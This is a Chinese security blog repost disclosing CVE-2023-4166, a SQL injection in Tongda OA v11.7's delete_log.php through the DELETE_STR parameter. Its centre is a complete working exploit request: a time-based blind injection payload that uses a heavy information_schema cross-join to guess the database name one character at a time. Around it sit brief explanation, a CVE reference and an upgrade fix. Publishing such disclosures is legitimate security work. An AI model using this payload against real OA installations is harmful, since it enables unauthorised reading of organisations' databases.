某OA注入漏洞(附EXP)

admin 2023年8月10日01:15:21评论33 views字数 1077阅读3分35秒阅读模式

某OA注入漏洞(附EXP)

0x01 前言
通达OA中发现一个漏洞,并被列为严重漏洞。该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入
0x02 影响平台
本地测试环境 v11.7  其他版本未知
0x03 漏洞复现

还是辣个熟悉的页面~~

某OA注入漏洞(附EXP)

EXP:

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 192.168.232.137:8098User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46Upgrade-Insecure-Requests: 1

本地环境的数据库为TD_OA

在ASCII码中84代表的是 T

某OA注入漏洞(附EXP)

某OA注入漏洞(附EXP)

反之如果不是便是这个酱紫

某OA注入漏洞(附EXP)

0x04 参考来源
https://mp.weixin.qq.com/s/37VKi2Az7LX9G9wVYe6POQhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4166
0x05 修复方案
该漏洞已向公众披露并可能被使用。升级到版本11.10可以解决这个问题。建议升级受影响的组件。

原文始发于微信公众号(EchoSec):某OA注入漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月10日01:15:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某OA注入漏洞(附EXP)https://cn-sec.com/archives/1945412.html

发表评论

匿名网友 填写信息